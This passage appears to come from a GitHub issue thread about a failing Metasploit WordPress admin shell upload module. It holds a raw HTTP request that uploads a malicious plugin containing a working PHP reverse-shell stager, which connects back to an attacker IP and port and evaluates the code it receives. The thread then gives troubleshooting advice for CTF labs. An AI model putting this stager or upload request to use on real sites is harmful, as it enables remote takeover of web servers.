        <input type="hidden" id="_wpnonce" name="_wpnonce" value="d4b2632e29" /><input type="hidden" name="_wp_http_referer" value="/wp-admin/plugin-install.php?tab=upload" />     <label class="screen-reader-text" for="pluginzip">Plugin zip file</label>
        <input type="file" id="pluginzip" name="pluginzip" />
        <input type="submit" name="install-plugin-submit" id="install-plugin-submit" class="button" value="Install Now"  /> </form>
</div>
</div>

<div class="clear"></div></div><!-- wpbody-content -->
<div class="clear"></div></div><!-- wpbody -->
<div class="clear"></div></div><!-- wpcontent -->

<div id="wpfooter" role="contentinfo">
        <p id="footer-left" class="alignleft">
        <span id="footer-thankyou">Thank you for creating with <a href="https://wordpress.org/">WordPress</a>.</span>   </p>
    <p id="footer-upgrade" class="alignright">
        Version 4.3.1   </p>
    <div class="clear"></div>
</div>
    <div id="wp-auth-check-wrap" class="hidden">
    <div id="wp-auth-check-bg"></div>
    <div id="wp-auth-check">
    <div class="wp-auth-check-close" tabindex="0" title="Close"></div>
            <div id="wp-auth-check-form" data-src="http://10.10.45.132/wp-login.php?interim-login=1"></div>
            <div class="wp-auth-fallback">
        <p><b class="wp-auth-fallback-expired" tabindex="0">Session expired</b></p>
        <p><a href="http://10.10.45.132/wp-login.php" target="_blank">Please log in again.</a>
        The login page will open in a new window. After logging in you can close it and return to this page.</p>
    </div>
    </div>
    </div>

<script type='text/javascript'>
/* <![CDATA[ */
var commonL10n = {"warnDelete":"You are about to permanently delete the selected items.\n  'Cancel' to stop, 'OK' to delete.","dismiss":"Dismiss this notice."};var thickboxL10n = {"next":"Next >","prev":"< Prev","image":"Image","of":"of","close":"Close","noiframes":"This feature requires inline frames. You have iframes disabled or your browser does not support them.","loadingAnimation":"http:\/\/10.10.45.132\/wp-includes\/js\/thickbox\/loadingAnimation.gif"};var plugininstallL10n = {"plugin_information":"Plugin Information:","ays":"Are you sure you want to install this plugin?"};var heartbeatSettings = {"nonce":"6c48aca9dd"};var authcheckL10n = {"beforeunload":"Your session has expired. You can log in again from this page or go to the login page.","interval":"180"};/* ]]> */
</script>
<script type='text/javascript' src='http://10.10.45.132/wp-admin/load-scripts.php?c=0&amp;load%5B%5D=hoverIntent,common,admin-bar,thickbox,plugin-install,svg-painter,heartbeat,wp-auth-check&amp;ver=4.3.1'></script>

<div class="clear"></div></div><!-- wpwrap -->
<script type="text/javascript">if(typeof wpOnload=='function')wpOnload();</script>
</body>
</html>

####################
# Request:
####################
POST /wp-admin/update.php?action=upload-plugin HTTP/1.1
Host: 10.10.45.132
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_9bf265f3222729fd15f0d0fdbd833757=elliot%7C1628572368%7CjWgEc5cRPLVo5ZWCzCLXDZ66tQBwCX8yPhc3WENfeGj%7Cbf274139fb2775a695d41b0b0969805cc6b89cf3072aedcb56550d03f8dc86b2; wordpress_9bf265f3222729fd15f0d0fdbd833757=elliot%7C1628572368%7CjWgEc5cRPLVo5ZWCzCLXDZ66tQBwCX8yPhc3WENfeGj%7Cbf274139fb2775a695d41b0b0969805cc6b89cf3072aedcb56550d03f8dc86b2; wordpress_logged_in_9bf265f3222729fd15f0d0fdbd833757=elliot%7C1628572368%7CjWgEc5cRPLVo5ZWCzCLXDZ66tQBwCX8yPhc3WENfeGj%7C0474feaa2e15ec02391bccad8e07d91a5f7c822278c0e3d39be90f65751b9f9f;
Content-Type: multipart/form-data; boundary=_Part_1016_2557091085_2989972072
Content-Length: 2103

--_Part_1016_2557091085_2989972072
Content-Disposition: form-data; name="_wpnonce"

d4b2632e29
--_Part_1016_2557091085_2989972072
Content-Disposition: form-data; name="_wp_http_referer"

/wp-admin/plugin-install.php?tab=upload
--_Part_1016_2557091085_2989972072
Content-Disposition: form-data; name="pluginzip"; filename="QRGSngvTeh.zip"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

PKoS0$����QRGSngvTeh/QRGSngvTeh.php<?php
/**
 * Plugin Name: QRGSngvTeh
 * Version: 1.9.06
 * Author: lKpAFsJFXi
 * Author URI: http://ACDoPArlmd.com
 * License: GPL2
 */
?>PKoSD�YYQRGSngvTeh/BOuJOCfsvV.php/*<?php /**/ error_reporting(0); $ip = '10.14.13.191'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();PKoS0$����QRGSngvTeh/QRGSngvTeh.phpPKoSD�YY�QRGSngvTeh/BOuJOCfsvV.phpPK�Q
--_Part_1016_2557091085_2989972072
Content-Disposition: form-data; name="install-plugin-submit"

Install Now
--_Part_1016_2557091085_2989972072--

####################
# Response:
####################
No response received
[-] Exploit aborted due to failure: unexpected-reply: Failed to upload the payload

bcoles commented 3 years ago

Sorry to open an old issue but how would one allow the creation of directories from wordpress admin itself?

It appears your issue is different to the issues described above. The error message you have received relates to a timeout.

grepcoffee commented 2 years ago

Could also be a timeout issue. try setting it like below.

set httpclienttimeout 60

d914e3ecf6cc481114a3f534a5faf90b commented 1 year ago

Recently ran into this issue, here are my findings.

If you are seeing: Exploit aborted due to failure: not-found: The target does not appear to be using WordPress** Then please: set wpcheck false

If you are seeing: Exploit aborted due to failure: unexpected-reply: Failed to upload the payload Then please: set httpclienttimeout 300

Lastly, please confirm that the IP you're using for LHOST is correct. For instance, if you're working the CTF through TryHackMe then please use your VPN IP.

bcoles commented 1 year ago

If you are seeing: Exploit aborted due to failure: not-found: The target does not appear to be using WordPress** Then please: set wp-check false

The option is called WPCHECK rather than wp-check.

set WPCHECK false

https://github.com/rapid7/metasploit-framework/blob/0436e8bad998d035e6558ebcbb2e878eaf898ce6/lib/msf/core/exploit/remote/http/wordpress.rb#L33

secsalem commented 1 year ago

I think there is sessions or something in the background that may trigger this , may need further research but for a quick solution that comes to mind >>

Restart VM or restart target machines

rapid7 / metasploit-framework